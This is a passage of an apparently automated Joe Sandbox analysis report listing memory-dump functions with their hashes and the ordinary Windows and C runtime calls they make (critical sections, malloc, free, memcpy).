                                                                  • Instruction ID: 62c1e7399946e688952d1309bfb94936d58cd9a32245c9ef01a2bc879d10a171
                                                                  • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                  • Instruction Fuzzy Hash: 9291C135905656DFCB14CF08C490A5ABBA5FF89318B28858CDC58AB715D372FD82CBE0
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9F0918
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9F09A6
                                                                  • EnterCriticalSection.KERNEL32(6CA3E7DC,?,00000000), ref: 6C9F09F3
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9F0ACB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3168844106-0
                                                                  • Opcode ID: 828bbc602e7b839743640ebee4a5f5f95ec8ff959eea907848eac43103447bb1
                                                                  • Instruction ID: 2ab3e565592968d4cf8e14176449cbd67cbc2df70f66a239e467e34b49372668
                                                                  • Opcode Fuzzy Hash: 828bbc602e7b839743640ebee4a5f5f95ec8ff959eea907848eac43103447bb1
                                                                  • Instruction Fuzzy Hash: A9511836705755CBEB1C9A19D82866673BEEB81B24724912ADD79D7F80D730EC4387C0
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CA0B2C9,?,?,?,6CA0B127,?,?,?,?,?,?,?,?,?,6CA0AE52), ref: 6CA0B628
                                                                    • Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA090FF
                                                                    • Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA09108
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CA0B2C9,?,?,?,6CA0B127,?,?,?,?,?,?,?,?,?,6CA0AE52), ref: 6CA0B67D
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CA0B2C9,?,?,?,6CA0B127,?,?,?,?,?,?,?,?,?,6CA0AE52), ref: 6CA0B708
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CA0B127,?,?,?,?,?,?,?,?), ref: 6CA0B74D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: cd134e67466ab0167147fe009fc77c5bf6745556a7fd9b1591b988d87b2cff5c
                                                                  • Instruction ID: 95792cc0caddbe13db0513f6d9c49249def2d754371695dc13c923f09a0c0213
                                                                  • Opcode Fuzzy Hash: cd134e67466ab0167147fe009fc77c5bf6745556a7fd9b1591b988d87b2cff5c
                                                                  • Instruction Fuzzy Hash: BB51D271B023168FDB14CF18FA8069EB7B1FF45389F05862DC85AA7700D731A884CB91
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C9FFF2A), ref: 6CA0DFFD
                                                                    • Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA090FF
                                                                    • Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA09108
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C9FFF2A), ref: 6CA0E04A
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C9FFF2A), ref: 6CA0E0C0
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C9FFF2A), ref: 6CA0E0FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 4c64a4fdbfcd71ee0701cfc39938c8a8ffe775c1c40f3e6323c7c38674d505c2
                                                                  • Instruction ID: fa3fb3e7daca67cc6ad247faf1776dc9473cbc981a755bcf3c6733f7eb227767
                                                                  • Opcode Fuzzy Hash: 4c64a4fdbfcd71ee0701cfc39938c8a8ffe775c1c40f3e6323c7c38674d505c2
                                                                  • Instruction Fuzzy Hash: 4A41D2B17442168FEB14CF68E89035A73B2BB4634CF184939D596DBB40E731E985CBD2
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CA06EAB
                                                                  • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CA06EFA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CA06F1E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA06F5C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$freememcpy
                                                                  • String ID:
                                                                  • API String ID: 4259248891-0
                                                                  • Opcode ID: 528f5da9b9682e9ecdeb2a9b633d15e1f14c173150000a0aa69bd1176a42437f
                                                                  • Instruction ID: 4345304294967c1a6952cadf6c77a1204ed4c0869506462779da06d99710d669
                                                                  • Opcode Fuzzy Hash: 528f5da9b9682e9ecdeb2a9b633d15e1f14c173150000a0aa69bd1176a42437f
                                                                  • Instruction Fuzzy Hash: 6831B271B1060A8FEB14CF2CDD806AA73F9AB8534CF548639D81AC7651EB31E6D98790
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C9C0A4D), ref: 6CA1B5EA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C9C0A4D), ref: 6CA1B623
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C9C0A4D), ref: 6CA1B66C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C9C0A4D), ref: 6CA1B67F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$free
                                                                  • String ID:
                                                                  • API String ID: 1480856625-0
                                                                  • Opcode ID: 7a13623448f17cbb755fb4b486b9a168536711d4e4e38e3d891e1ec00b6cbf11
                                                                  • Instruction ID: 18ccede73ff134ba4b2d17ec30356db5d59719f9a0ef7d444d83955fa663f529
                                                                  • Opcode Fuzzy Hash: 7a13623448f17cbb755fb4b486b9a168536711d4e4e38e3d891e1ec00b6cbf11
                                                                  • Instruction Fuzzy Hash: A331F6B1A042268FDB10CF59DC4469AB7B6FF81304F1A8769C81ADBB01DB31E955CBA0
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C9EF611
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C9EF623
                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C9EF652
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C9EF668
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                  • Instruction ID: ab7972a6018ce8abbe697e6a6818b8499f878c4261a61f3ea213d168397e2821
                                                                  • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                  • Instruction Fuzzy Hash: 9A316171A002149FD725CF1DDCC0AABB7B9EFD8358B188539FA498BB04D631E984CB90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 17e0d79c72cf23687326422390c40c949084f6519854ed09bc1d3aa2d7351377
                                                                  • Instruction ID: d86d0de120ad167d8d1e46bb9cb2aad098fac81c4862ca51a5e8e374232d8584
                                                                  • Opcode Fuzzy Hash: 17e0d79c72cf23687326422390c40c949084f6519854ed09bc1d3aa2d7351377
                                                                  • Instruction Fuzzy Hash: E5F049B67003016BE7009F08ECC498BB3ADEF5129DB144231EA0AD3B01E331F859C7A2